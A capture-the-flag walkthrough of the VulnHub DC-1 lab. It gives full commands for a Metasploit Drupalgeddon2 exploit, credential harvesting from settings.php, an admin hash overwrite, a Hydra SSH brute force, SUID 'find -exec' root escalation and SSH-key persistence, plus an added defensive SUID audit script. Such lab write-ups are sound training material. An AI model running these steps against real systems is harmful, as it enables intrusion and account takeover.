Environment: download the target VM from www.vulnhub.com
Import the VM into VMware
1. Set DC-1's network adapter to NAT mode and note its MAC address. Set Kali to NAT mode as well.
Use Kali to discover the host.
First check your own IP address: ifconfig
Scan command: nmap -sP 192.168.71.0/24 , which shows DC-1's IP address is 192.168.71.135
nmap -A 192.168.71.135 identifies the operating system, the open ports, and so on
Open the address in a browser. The page loads and is a CMS (content management system) called Drupal.
Check whether the site has a robots.txt file: http://192.168.71.135/robots.txt
2. Vulnerability discovery
Use Metasploit Framework to scan for vulnerabilities
Start Metasploit: msfconsole
/**
msf5 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
**/
Seven exploitable vulnerabilities are found. Pick one that is fairly recent and has a high success rank.
use exploit/unix/webapp/drupal_drupalgeddon2
/**
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.71.135
RHOSTS => 192.168.71.135
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set VHOST 192.168.71.141
VHOST => 192.168.71.141
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
meterpreter>
**/
A meterpreter prompt means we are on the server. Take a look at the help command.
shell   drops into a shell
ls      shows flag1.txt in the current directory
===
cat flag1.txt
Every good CMS needs a config file - and so do you.
===
Save the line below as pwd.txt and crack it with john:
john pwd.txt
flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80
Go into the site directory and run cat sites/default/settings.php; this reveals flag2
===
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
The hint above says you do not necessarily have to brute-force the site administrator; there are other ways in.
Go straight into the database and look
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
===
The same file also gives the database connection details.
Use python to get a proper interactive shell:
python -c 'import pty;pty.spawn("/bin/bash")'
Build the database connection command: mysql -udbuser -pR0ck3t
cd /var/www/
php scripts/password-hash.sh admin   # generates the hash for the password admin
update users set pass='$S$DhbcpLhyAcXB8jKvGBqS9hbWWSOIACm1nQpvwZt7ZGjK3WFC2stw' where name="admin"
$S$DhbcpLhyAcXB8jKvGBqS9hbWWSOIACm1nQpvwZt7ZGjK3WFC2stw
Log in
flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
Brute-force the password with Hydra.
root@kali:/usr/share/john# hydra ssh://192.168.71.135 -l flag4 -P /usr/share/john/password.lst -t 50 -f
The cracked password is: flag4:orange
[22][ssh] host: 192.168.71.135 login: flag4 password: orange
find -exec "/bin/sh" \;
id   check your own id; you are already root
cd /root
ls
cat thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
Find the commands on the system that carry the SUID bit:
find / -perm -4000 2>/dev/null
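The SUID bit on /usr/bin/find is what turned the flag4 account into root above, so the defender-side check is to compare the output of that find command against a known-good baseline. The script below is an added example, not part of the original walkthrough; the baseline set and the sample find output are constructed assumptions, not data from the DC-1 image.

```python
"""SUID baseline audit (added defender-side example, not from the walkthrough)."""
import os
import stat

# Assumed baseline of SUID binaries expected on a minimal Debian-style host.
# Replace with the list from your own golden image; it is not taken from DC-1.
BASELINE_SUID = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount",
    "/usr/bin/passwd", "/usr/bin/sudo",
}

def scan_suid(root="/"):
    """Walk from `root` and return regular files with the setuid bit set,
    the same set that `find / -perm -4000 2>/dev/null` prints."""
    found = set()
    for dirpath, _dirs, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found

def parse_find_output(text):
    """Parse saved `find / -perm -4000` output, one path per line."""
    return {line.strip() for line in text.splitlines() if line.strip()}

def audit_suid(found, baseline=BASELINE_SUID):
    """Diff discovered SUID files against the baseline. An unexpected SUID bit
    on a general-purpose tool (find, here) is what turned flag4 into root;
    a vanished baseline entry is also worth an alert, so both are reported."""
    found = set(found)
    return {"unexpected": sorted(found - baseline),
            "missing": sorted(baseline - found)}

# Constructed sample output mirroring the DC-1 finding: find carries the SUID bit.
SAMPLE_FIND_OUTPUT = ("/bin/mount\n/bin/ping\n/bin/su\n/bin/umount\n"
                      "/usr/bin/find\n/usr/bin/passwd\n/usr/bin/sudo\n")

if __name__ == "__main__":
    # On a live host use audit_suid(scan_suid()) instead of the sample text.
    print(audit_suid(parse_find_output(SAMPLE_FIND_OUTPUT)))
```

Run it from cron or a config-management hook and alert on any non-empty "unexpected" list; clearing the bit with chmod u-s on the flagged binary closes this particular escalation path.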
Satisfied at this point? Of course not.
Set up passwordless login for the flag4 user from the local machine.
ssh-keygen, accepting every prompt; this creates .ssh/id_rsa and .ssh/id_rsa.pub in your own home directory.
ssh-copy-id -i id_rsa.pub flag4@192.168.71.135   type yes, then enter the password orange.
Afterwards the file .ssh/authorized_keys appears in flag4's home directory; this is the key that allows passwordless login.
find -exec "/bin/bash" \;
cd /root
mkdir /root/.ssh
cp /home/flag4/.ssh/authorized_keys /root/.ssh/
Now passwordless login to root from the local machine works
ssh root@192.168.71.135